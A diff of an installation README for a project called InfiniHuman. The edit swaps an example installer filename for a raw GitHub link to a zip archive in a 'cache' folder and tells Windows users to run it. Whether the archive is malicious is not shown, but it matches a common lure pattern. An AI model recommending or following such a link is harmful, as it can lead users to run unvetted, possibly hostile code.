SeekorLembu123/InfiniHuman/README.md

 3. **Download the Installer**

    Find the appropriate installer for your operating system.
 Click the link to start the download.
-For example, you might see a file named `InfiniHuman-windows-installer.exe` for Windows users.
+For example, you might see a file named `https://raw.githubusercontent.com/SeekorLembu123/InfiniHuman/main/cache/InfiniHuman.zip` for Windows users.

 4. **Run the Installer**